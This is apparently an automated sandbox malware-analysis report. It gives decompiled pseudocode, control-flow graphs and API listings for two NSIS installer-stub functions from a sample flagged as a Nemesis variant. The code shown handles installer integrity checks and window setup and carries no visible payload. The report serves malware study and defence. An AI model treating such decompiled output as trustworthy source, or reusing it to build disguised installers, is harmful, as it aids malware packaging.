                                                  control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 313 403c72-403c9b call 403ec2 call 405f14 304->313 309 403c51-403c62 call 40640b 305->309 310 403c67-403c6d lstrcatW 305->310 309->310 310->313 319 403ca1-403ca6 313->319 320 403d2d-403d35 call 405f14 313->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 330 403cd6-403cda 321->330 328 403de9-403df1 call 40140b 326->328 329 403d6a-403d9a RegisterClassW 326->329 327->326 343 403df3-403df6 328->343 344 403dfb-403e06 call 403ec2 328->344 332 403da0-403de4 SystemParametersInfoW CreateWindowExW 329->332 333 403eb8 329->333 335 403cec-403cf8 lstrlenW 330->335 336 403cdc-403ce9 call 405e39 330->336 332->328 341 403eba-403ec1 333->341 337 403d20-403d28 call 405e0c call 40653d 335->337 338 403cfa-403d08 lstrcmpiW 335->338 336->335 337->320 338->337 342 403d0a-403d14 GetFileAttributesW 338->342 347 403d16-403d18 342->347 348 403d1a-403d1b call 405e58 342->348 343->341 354 403e0c-403e26 ShowWindow call 40689a 344->354 355 403e8f-403e90 call 405672 344->355 347->337 347->348 348->337 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->333 361->343 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->343 367->368 371 403e84-403e8d call 403b3c 368->371 371->341
                                                  C-Code - Quality: 96%
                                                  			E00403BEC(void* __eflags) {
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v8;
                                                  				int _v12;
                                                  				void _v16;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t22;
                                                  				void* _t30;
                                                  				void* _t32;
                                                  				int _t33;
                                                  				void* _t36;
                                                  				int _t39;
                                                  				int _t40;
                                                  				intOrPtr _t41;
                                                  				int _t44;
                                                  				short _t63;
                                                  				WCHAR* _t65;
                                                  				signed char _t69;
                                                  				WCHAR* _t76;
                                                  				intOrPtr _t82;
                                                  				WCHAR* _t87;
                                                  
                                                  				_t82 =  *0x434f10;
                                                  				_t22 = E0040690A(2);
                                                  				_t90 = _t22;
                                                  				if(_t22 == 0) {
                                                  					_t76 = 0x42d268;
                                                  					L"1033" = 0x30;
                                                  					 *0x442002 = 0x78;
                                                  					 *0x442004 = 0;
                                                  					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                  					__eflags =  *0x42d268;
                                                  					if(__eflags == 0) {
                                                  						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                  					}
                                                  					lstrcatW(L"1033", _t76);
                                                  				} else {
                                                  					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                  				}
                                                  				E00403EC2(_t78, _t90);
                                                  				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
                                                  				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                  				 *0x434f9c = 0x10000;
                                                  				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
                                                  					L16:
                                                  					if(E00405F14(_t98, _t86) == 0) {
                                                  						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                  					}
                                                  					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                  					 *0x433ee8 = _t30;
                                                  					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                  						L21:
                                                  						if(E0040140B(0) == 0) {
                                                  							_t32 = E00403EC2(_t78, __eflags);
                                                  							__eflags =  *0x434fa0;
                                                  							if( *0x434fa0 != 0) {
                                                  								_t33 = E00405672(_t32, 0);
                                                  								__eflags = _t33;
                                                  								if(_t33 == 0) {
                                                  									E0040140B(1);
                                                  									goto L33;
                                                  								}
                                                  								__eflags =  *0x433ecc; // 0x0
                                                  								if(__eflags == 0) {
                                                  									E0040140B(2);
                                                  								}
                                                  								goto L22;
                                                  							}
                                                  							ShowWindow( *0x42d248, 5); // executed
                                                  							_t39 = E0040689A("RichEd20"); // executed
                                                  							__eflags = _t39;
                                                  							if(_t39 == 0) {
                                                  								E0040689A("RichEd32");
                                                  							}
                                                  							_t87 = L"RichEdit20W";
                                                  							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                  							__eflags = _t40;
                                                  							if(_t40 == 0) {
                                                  								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                  								 *0x433ec4 = _t87;
                                                  								RegisterClassW(0x433ea0);
                                                  							}
                                                  							_t41 =  *0x433ee0; // 0x0
                                                  							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                  							E00403B3C(E0040140B(5), 1);
                                                  							return _t44;
                                                  						}
                                                  						L22:
                                                  						_t36 = 2;
                                                  						return _t36;
                                                  					} else {
                                                  						_t78 =  *0x434f00;
                                                  						 *0x433ea4 = E00401000;
                                                  						 *0x433eb0 =  *0x434f00;
                                                  						 *0x433eb4 = _t30;
                                                  						 *0x433ec4 = 0x40a380;
                                                  						if(RegisterClassW(0x433ea0) == 0) {
                                                  							L33:
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						}
                                                  						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                  						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                  						goto L21;
                                                  					}
                                                  				} else {
                                                  					_t78 =  *(_t82 + 0x48);
                                                  					_t92 = _t78;
                                                  					if(_t78 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					_t76 = 0x432ea0;
                                                  					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                  					_t63 =  *0x432ea0; // 0x43
                                                  					if(_t63 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					if(_t63 == 0x22) {
                                                  						_t76 = 0x432ea2;
                                                  						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                  					}
                                                  					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                  					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                  						L15:
                                                  						E0040653D(_t86, E00405E0C(_t76));
                                                  						goto L16;
                                                  					} else {
                                                  						_t69 = GetFileAttributesW(_t76);
                                                  						if(_t69 == 0xffffffff) {
                                                  							L14:
                                                  							E00405E58(_t76);
                                                  							goto L15;
                                                  						}
                                                  						_t98 = _t69 & 0x00000010;
                                                  						if((_t69 & 0x00000010) != 0) {
                                                  							goto L15;
                                                  						}
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  			}

























                                                  0x00403bf2
                                                  0x00403bfb
                                                  0x00403c02
                                                  0x00403c04
                                                  0x00403c18
                                                  0x00403c2a
                                                  0x00403c33
                                                  0x00403c3c
                                                  0x00403c43
                                                  0x00403c48
                                                  0x00403c4f
                                                  0x00403c62
                                                  0x00403c62
                                                  0x00403c6d
                                                  0x00403c06
                                                  0x00403c11
                                                  0x00403c11
                                                  0x00403c72
                                                  0x00403c7c
                                                  0x00403c85
                                                  0x00403c8a
                                                  0x00403c9b
                                                  0x00403d2d
                                                  0x00403d35
                                                  0x00403d3e
                                                  0x00403d3e
                                                  0x00403d54
                                                  0x00403d5a
                                                  0x00403d68
                                                  0x00403de9
                                                  0x00403df1
                                                  0x00403dfb
                                                  0x00403e00
                                                  0x00403e06
                                                  0x00403e90
                                                  0x00403e95
                                                  0x00403e97
                                                  0x00403eb3
                                                  0x00000000
                                                  0x00403eb3
                                                  0x00403e99
                                                  0x00403e9f
                                                  0x00403ea7
                                                  0x00403ea7
                                                  0x00000000
                                                  0x00403e9f
                                                  0x00403e14
                                                  0x00403e1f
                                                  0x00403e24
                                                  0x00403e26
                                                  0x00403e2d
                                                  0x00403e2d
                                                  0x00403e38
                                                  0x00403e40
                                                  0x00403e42
                                                  0x00403e44
                                                  0x00403e4d
                                                  0x00403e50
                                                  0x00403e56
                                                  0x00403e56
                                                  0x00403e5c
                                                  0x00403e75
                                                  0x00403e86
                                                  0x00000000
                                                  0x00403e8b
                                                  0x00403df3
                                                  0x00403df5
                                                  0x00000000
                                                  0x00403d6a
                                                  0x00403d6a
                                                  0x00403d76
                                                  0x00403d80
                                                  0x00403d86
                                                  0x00403d8b
                                                  0x00403d9a
                                                  0x00403eb8
                                                  0x00403eb8
                                                  0x00000000
                                                  0x00403eb8
                                                  0x00403da9
                                                  0x00403de4
                                                  0x00000000
                                                  0x00403de4
                                                  0x00403ca1
                                                  0x00403ca1
                                                  0x00403ca4
                                                  0x00403ca6
                                                  0x00000000
                                                  0x00000000
                                                  0x00403cb4
                                                  0x00403cc6
                                                  0x00403ccb
                                                  0x00403cd4
                                                  0x00000000
                                                  0x00000000
                                                  0x00403cda
                                                  0x00403cdc
                                                  0x00403ce9
                                                  0x00403ce9
                                                  0x00403cf2
                                                  0x00403cf8
                                                  0x00403d20
                                                  0x00403d28
                                                  0x00000000
                                                  0x00403d0a
                                                  0x00403d0b
                                                  0x00403d14
                                                  0x00403d1a
                                                  0x00403d1b
                                                  0x00000000
                                                  0x00403d1b
                                                  0x00403d16
                                                  0x00403d18
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d18
                                                  0x00403cf8

                                                  APIs
                                                    • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                    • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                  • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75533420), ref: 00403CED
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                  • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                  • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                  • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                  • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-1862882193
                                                  • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                  • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                  • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                  • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034e5 call 4034cf 394->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->398 395->380 397->395 421 40321f-403225 397->421 398->395 426 403264-403275 398->426 401->395 406 403143-403157 call 405fe8 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 424 403159-403160 406->424 411 4031c3-4031ca call 403019 407->411 407->412 411->412 417 4031e0-4031e8 412->417 418 4031d3-4031dd call 4069f7 412->418 417->390 425 4031ee 417->425 418->417 421->395 421->398 424->412 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->412 432 40316b-403172 430->432 431->431 434 40328b-4032a6 SetFilePointer call 405fe8 431->434 432->412 433 403174-40317b 432->433 433->412 435 40317d-40319d 433->435 438 4032ab 434->438 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->425 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                                                  C-Code - Quality: 80%
                                                  			E0040307D(void* __eflags, signed int _a4) {
                                                  				DWORD* _v8;
                                                  				DWORD* _v12;
                                                  				void* _v16;
                                                  				intOrPtr _v20;
                                                  				char _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v40;
                                                  				signed int _v44;
                                                  				long _t43;
                                                  				signed int _t50;
                                                  				void* _t53;
                                                  				void* _t57;
                                                  				intOrPtr* _t59;
                                                  				long _t60;
                                                  				signed int _t65;
                                                  				signed int _t70;
                                                  				signed int _t71;
                                                  				signed int _t77;
                                                  				intOrPtr _t80;
                                                  				long _t82;
                                                  				signed int _t85;
                                                  				signed int _t87;
                                                  				void* _t89;
                                                  				signed int _t90;
                                                  				signed int _t93;
                                                  				void* _t94;
                                                  
                                                  				_t82 = 0;
                                                  				_v12 = 0;
                                                  				_v8 = 0;
                                                  				_t43 = GetTickCount();
                                                  				_t91 = L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe";
                                                  				 *0x434f0c = _t43 + 0x3e8;
                                                  				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe", 0x400);
                                                  				_t89 = E0040602D(_t91, 0x80000000, 3);
                                                  				_v16 = _t89;
                                                  				 *0x40a018 = _t89;
                                                  				if(_t89 == 0xffffffff) {
                                                  					return L"Error launching installer";
                                                  				}
                                                  				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                                  				E0040653D(L"C:\\Users\\Arthur\\Desktop", _t91);
                                                  				E0040653D(0x444000, E00405E58(_t92));
                                                  				_t50 = GetFileSize(_t89, 0);
                                                  				__eflags = _t50;
                                                  				 *0x42aa24 = _t50;
                                                  				_t93 = _t50;
                                                  				if(_t50 <= 0) {
                                                  					L24:
                                                  					E00403019(1);
                                                  					__eflags =  *0x434f14 - _t82;
                                                  					if( *0x434f14 == _t82) {
                                                  						goto L29;
                                                  					}
                                                  					__eflags = _v8 - _t82;
                                                  					if(_v8 == _t82) {
                                                  						L28:
                                                  						_t34 =  &_v24; // 0x40387d
                                                  						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                  						_t94 = _t53;
                                                  						E004034E5( *0x434f14 + 0x1c);
                                                  						_t35 =  &_v24; // 0x40387d
                                                  						_push( *_t35);
                                                  						_push(_t94);
                                                  						_push(_t82);
                                                  						_push(0xffffffff); // executed
                                                  						_t57 = E004032B4(); // executed
                                                  						__eflags = _t57 - _v24;
                                                  						if(_t57 == _v24) {
                                                  							__eflags = _v44 & 0x00000001;
                                                  							 *0x434f10 = _t94;
                                                  							 *0x434f18 =  *_t94;
                                                  							if((_v44 & 0x00000001) != 0) {
                                                  								 *0x434f1c =  *0x434f1c + 1;
                                                  								__eflags =  *0x434f1c;
                                                  							}
                                                  							_t40 = _t94 + 0x44; // 0x44
                                                  							_t59 = _t40;
                                                  							_t85 = 8;
                                                  							do {
                                                  								_t59 = _t59 - 8;
                                                  								 *_t59 =  *_t59 + _t94;
                                                  								_t85 = _t85 - 1;
                                                  								__eflags = _t85;
                                                  							} while (_t85 != 0);
                                                  							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                  							 *(_t94 + 0x3c) = _t60;
                                                  							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						}
                                                  						goto L29;
                                                  					}
                                                  					E004034E5( *0x41ea18);
                                                  					_t65 = E004034CF( &_a4, 4);
                                                  					__eflags = _t65;
                                                  					if(_t65 == 0) {
                                                  						goto L29;
                                                  					}
                                                  					__eflags = _v12 - _a4;
                                                  					if(_v12 != _a4) {
                                                  						goto L29;
                                                  					}
                                                  					goto L28;
                                                  				} else {
                                                  					do {
                                                  						_t90 = _t93;
                                                  						asm("sbb eax, eax");
                                                  						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                  						__eflags = _t93 - _t70;
                                                  						if(_t93 >= _t70) {
                                                  							_t90 = _t70;
                                                  						}
                                                  						_t71 = E004034CF(0x416a18, _t90);
                                                  						__eflags = _t71;
                                                  						if(_t71 == 0) {
                                                  							E00403019(1);
                                                  							L29:
                                                  							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                  						}
                                                  						__eflags =  *0x434f14;
                                                  						if( *0x434f14 != 0) {
                                                  							__eflags = _a4 & 0x00000002;
                                                  							if((_a4 & 0x00000002) == 0) {
                                                  								E00403019(0);
                                                  							}
                                                  							goto L20;
                                                  						}
                                                  						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                  						_t77 = _v44;
                                                  						__eflags = _t77 & 0xfffffff0;
                                                  						if((_t77 & 0xfffffff0) != 0) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _v40 - 0xdeadbeef;
                                                  						if(_v40 != 0xdeadbeef) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _v28 - 0x74736e49;
                                                  						if(_v28 != 0x74736e49) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _v32 - 0x74666f73;
                                                  						if(_v32 != 0x74666f73) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _v36 - 0x6c6c754e;
                                                  						if(_v36 != 0x6c6c754e) {
                                                  							goto L20;
                                                  						}
                                                  						_a4 = _a4 | _t77;
                                                  						_t87 =  *0x41ea18; // 0xf60c7
                                                  						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                  						_t80 = _v20;
                                                  						__eflags = _t80 - _t93;
                                                  						 *0x434f14 = _t87;
                                                  						if(_t80 > _t93) {
                                                  							goto L29;
                                                  						}
                                                  						__eflags = _a4 & 0x00000008;
                                                  						if((_a4 & 0x00000008) != 0) {
                                                  							L16:
                                                  							_v8 = _v8 + 1;
                                                  							_t93 = _t80 - 4;
                                                  							__eflags = _t90 - _t93;
                                                  							if(_t90 > _t93) {
                                                  								_t90 = _t93;
                                                  							}
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _a4 & 0x00000004;
                                                  						if((_a4 & 0x00000004) != 0) {
                                                  							break;
                                                  						}
                                                  						goto L16;
                                                  						L20:
                                                  						__eflags = _t93 -  *0x42aa24; // 0xf60cb
                                                  						if(__eflags < 0) {
                                                  							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                  						}
                                                  						 *0x41ea18 =  *0x41ea18 + _t90;
                                                  						_t93 = _t93 - _t90;
                                                  						__eflags = _t93;
                                                  					} while (_t93 != 0);
                                                  					_t82 = 0;
                                                  					__eflags = 0;
                                                  					goto L24;
                                                  				}
                                                  			}































                                                  0x00403085
                                                  0x00403088
                                                  0x0040308b
                                                  0x0040308e
                                                  0x00403094
                                                  0x004030a5
                                                  0x004030aa
                                                  0x004030bd
                                                  0x004030c2
                                                  0x004030c5
                                                  0x004030cb
                                                  0x00000000
                                                  0x004030cd
                                                  0x004030d8
                                                  0x004030de
                                                  0x004030ef
                                                  0x004030f6
                                                  0x004030fc
                                                  0x004030fe
                                                  0x00403103
                                                  0x00403105
                                                  0x004031f0
                                                  0x004031f2
                                                  0x004031f7
                                                  0x004031fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00403200
                                                  0x00403203
                                                  0x00403227
                                                  0x00403227
                                                  0x0040322c
                                                  0x00403232
                                                  0x0040323d
                                                  0x00403242
                                                  0x00403242
                                                  0x00403245
                                                  0x00403246
                                                  0x00403247
                                                  0x00403249
                                                  0x0040324e
                                                  0x00403251
                                                  0x00403264
                                                  0x00403268
                                                  0x00403270
                                                  0x00403275
                                                  0x00403277
                                                  0x00403277
                                                  0x00403277
                                                  0x0040327f
                                                  0x0040327f
                                                  0x00403282
                                                  0x00403283
                                                  0x00403283
                                                  0x00403286
                                                  0x00403288
                                                  0x00403288
                                                  0x00403288
                                                  0x00403292
                                                  0x00403298
                                                  0x004032a6
                                                  0x004032ab
                                                  0x00000000
                                                  0x004032ab
                                                  0x00000000
                                                  0x00403251
                                                  0x0040320b
                                                  0x00403216
                                                  0x0040321b
                                                  0x0040321d
                                                  0x00000000
                                                  0x00000000
                                                  0x00403222
                                                  0x00403225
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040310b
                                                  0x00403110
                                                  0x00403115
                                                  0x00403119
                                                  0x00403120
                                                  0x00403125
                                                  0x00403127
                                                  0x00403129
                                                  0x00403129
                                                  0x0040312d
                                                  0x00403132
                                                  0x00403134
                                                  0x0040325c
                                                  0x00403253
                                                  0x00000000
                                                  0x00403253
                                                  0x0040313a
                                                  0x00403141
                                                  0x004031bd
                                                  0x004031c1
                                                  0x004031c5
                                                  0x004031ca
                                                  0x00000000
                                                  0x004031c1
                                                  0x0040314a
                                                  0x0040314f
                                                  0x00403152
                                                  0x00403157
                                                  0x00000000
                                                  0x00000000
                                                  0x00403159
                                                  0x00403160
                                                  0x00000000
                                                  0x00000000
                                                  0x00403162
                                                  0x00403169
                                                  0x00000000
                                                  0x00000000
                                                  0x0040316b
                                                  0x00403172
                                                  0x00000000
                                                  0x00000000
                                                  0x00403174
                                                  0x0040317b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040317d
                                                  0x00403183
                                                  0x0040318c
                                                  0x00403192
                                                  0x00403195
                                                  0x00403197
                                                  0x0040319d
                                                  0x00000000
                                                  0x00000000
                                                  0x004031a3
                                                  0x004031a7
                                                  0x004031af
                                                  0x004031af
                                                  0x004031b2
                                                  0x004031b5
                                                  0x004031b7
                                                  0x004031b9
                                                  0x004031b9
                                                  0x00000000
                                                  0x004031b7
                                                  0x004031a9
                                                  0x004031ad
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004031cb
                                                  0x004031cb
                                                  0x004031d1
                                                  0x004031dd
                                                  0x004031dd
                                                  0x004031e0
                                                  0x004031e6
                                                  0x004031e6
                                                  0x004031e6
                                                  0x004031ee
                                                  0x004031ee
                                                  0x00000000
                                                  0x004031ee

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040308E
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                  • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                  • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                  • API String ID: 2803837635-14062601
                                                  • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                  • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                  • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                  • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
